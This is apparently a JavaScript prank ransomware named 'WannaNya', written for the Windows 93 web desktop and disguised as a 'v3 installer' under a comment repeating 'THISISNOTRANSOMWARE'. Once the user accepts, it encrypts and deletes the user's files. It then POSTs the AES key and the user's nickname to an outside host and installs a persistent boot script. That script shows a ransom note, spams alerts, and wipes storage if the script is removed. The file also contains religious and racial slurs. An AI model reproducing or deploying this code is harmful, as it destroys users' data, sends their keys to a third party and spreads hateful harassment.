// THISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARETHISISNOTRANSOMWARE

(async()=>{
  try {
    function epicAlert(a) {
      return new Promise(r => {
        $alert(a, r);
      });
    }

    var isOk = await epicAlert({
      msg: "Welcome to teh Windows 93 v3 installer. Do you want to install v3 nao?",
      btnOk: "GIVE V3",
      btnCancel: "maybe later",
      help: "<b>Windows 93 v3 Installer</b><br>It's not ransomware. Stop asking.",
      img: "/c/sys/skins/w93/win93.png",
      title: "Windows93 v3 Installer"
    });

    if (!isOk) {
      if (Math.random() < 0.2) {
        document.open();
        for (var i = 0; i < 1000; i++) {
          document.write("<h1>ALLAH IS DISPLEASED 😤😤😤</h1>");
        }
        document.close();
        alert("YOU DESERVE A while(true) FOR BEING A FILTHY INFIDEL");
        while (true) {
          alert("JIHAD");
        }
      } else {
        $alert({
          msg: "Seeya later liberal",
          img: "/c/files/images/icons/troll.png",
          title: "Windows93 v3 Installer"
        }, (doit) => (doit ? $exe : $noop)("reboot"));
      }
      return;
    }

    function epicOpen(file, type) {
      return new Promise((resolve, reject) => {
        try {
          $file.open(file, type, f => resolve(f));
        } catch (err) {
          rej(err);
        }
      });
    }

    var filelist = [];

    function scanFolder(folder, path) {
      if (!path.endsWith("/") && path != "") filelist.push(path);
      for (var file in folder) {
        if (folder[file] === 0) {
          filelist.push(path + file);
        } else {
          scanFolder(folder[file], path + file + "/");
        }
      }
    }

    function sendShit(key, id, nickname) {
      const params = new URLSearchParams({key: key, id: id, nickname: nickname});
      return fetch("https://1024x2.xyz/fuck.php", {
        method: "POST",
        body: params
      });
    }

    var delay = t => new Promise(r => setTimeout(r, t));


    var prog1 = $alert.progress("Upgrading to Windows93 v3...");

    // load lib
    await $loader.script("https://unpkg.com/aes-js@3.1.2/index.js");
    prog1.update(26);

    // gen 256-bit key
    var key = new Uint8Array(32);
    crypto.getRandomValues(key);
    prog1.update(47);

    // make unique id
    var furryshit = ["Nya", "Kawaii", "Desu", "Awoo", "Sugoi", "UwU", "OwO", "Yiff", "Rawr", "XD", "Murr"];
    var randfur = () => furryshit[Math.floor(Math.random() * furryshit.length)];
    var id = "###############".replace(/#/g, randfur);
    prog1.update(69);

    // get file list
    $explorer.refresh();
    scanFolder(le._files.a, "");
    filelist = filelist.filter(file => !file.endsWith(".WannaNya") && !file.endsWith(".lnk42"));
    prog1.update(100);

    // stop liberal from appear
    le._apps.vega.exec = $noop;

    // ENCRYPT!!!!!
    var prog2 = $alert.progress("Upgrading /a/ to v3 compatible format... Do not turn off your computer.");
    for (var i = 0; i < filelist.length; i++) {
      console.log(filelist[i]);
      var aes = new aesjs.ModeOfOperation.ctr(key);
      var file = new Uint8Array(await epicOpen("/a/" + filelist[i], "ArrayBuffer"));
      var encryptedFile = aes.encrypt(file);
      $db.set(filelist[i] + ".WannaNya", new Blob([encryptedFile]));
      $file.delete("/a/" + filelist[i]);
      prog2.update((i / filelist.length) * 100);
    }
    prog2.update(100);



    // send off id and key
    await sendShit(aesjs.utils.hex.fromBytes(key), id, localStorage[".config/trollbox/nick"]);

    le._settings.noSplash = true;

    localStorage["boot/Delete me, libtrad. I don't care, The damage is already done.js"] = `biosSetup = () => {while (true) alert("shut up liberal")}
$alert.error("OOPSIE WOOPSIE!! Uwu We made a fucky wucky!! A wittle fucko boingo! The code monkeys at our headquarters are working VEWY HAWD to fix this!");
$boot.BOOTLOG.innerHTML += "\\ngamer headset ... on\\nknuckles ... cracked\\ngirlfriend ... error\\nyep ... it's gamer time";
localStorage["desktop/WEADME.TXT"] = \`# OwO what's this?
oopsie, i encwypted youw fiwes and sent the key to the cweatow of me (・\\\`ω\\\´・)
don't twy wecuvwing them because i used vewy advanced encwyption to encwypt youw fiwes ^w^

# How do i get my shit back you fucking asshat
simpwe, you just send me 69 vbucks and i wiww send you a pwogwam that decwypts the fiwes fow you OwO
just send me a dm on discowd at [1024x2#1337] and i wiww wecuvw youw fiwes if you give me the vbucks ;;w;;

** youw unyaque id is [${id}] ^w^
** dm [1024x2#1337] on discowd fow info UwU\`;
$exe("textarea /a/desktop/WEADME.TXT");
var coolstyle = document.createElement("style");
coolstyle.innerText = "*{font-family:\\"Comic Sans MS\\" !important;font-size: 16px !important;}";
document.head.appendChild(coolstyle);
setInterval(() => $window.instances.filter(a => a !== null).forEach(win => {
  win.changeTitle("Oops! ^w^ Youw fiwes awe encwypted! (｀∇´) - WannaNya");
  win.changeIcon("//i.redd.it/5uyfvw6c7nc21.gif");
  console.group("xd");
  console.error("xd");
  console.groupEnd("xd");
  $log("xd");
  le._dom.taskbar.firstElementChild.lastElementChild.lastElementChild.innerText = "oh noes!!! me encwypted youw fiwes!!! - WannaNya";
  le._dom.taskbar.lastElementChild.lastElementChild.innerText = "Trololololo!!!!!! You got nae naed on by a liberl!!!!";
  le._dom.taskbar.lastElementChild.lastElementChild.style.width = "auto";
  if (!localStorage["boot/Delete me, libtrad. I don't care, The damage is already done.js"]) {
    localStorage.clear();
    $db.clear();
    setInterval(() => {$alert({msg:"hahaha SHUT UP YOUR BLACK!!!",center:false})}, 100);
  }
  $file.format = () => setInterval(() => {$alert({msg:"hahaha SHUT UP YOUR BLACK!!!",center:false})}, 100);
}), 50);
le._dom.background.style.backgroundImage = "url(https://i.imgur.com/hgLKvHE.jpg)";
le._dom.background.style.backgroundRepeat = "repeat";
$fs.utils.normalizeIcon = () => "/c/files/images/icons/troll.png";
$explorer.refresh();`;

    $alert({
      sound: false,
      msg: "Restarting...",
      btnOk: false,
      img: "/c/sys/skins/w93/win93.png",
      title: "Windows93 v3 Installer",
      closable: false
    });

    setTimeout(() => location.href = "http://windows93.net/", 1000);

  } catch (err) {
    $window.current.close();
    console.error(err);
    $alert.error("Something went wrong. Pretend this never happened.");
  }
})();
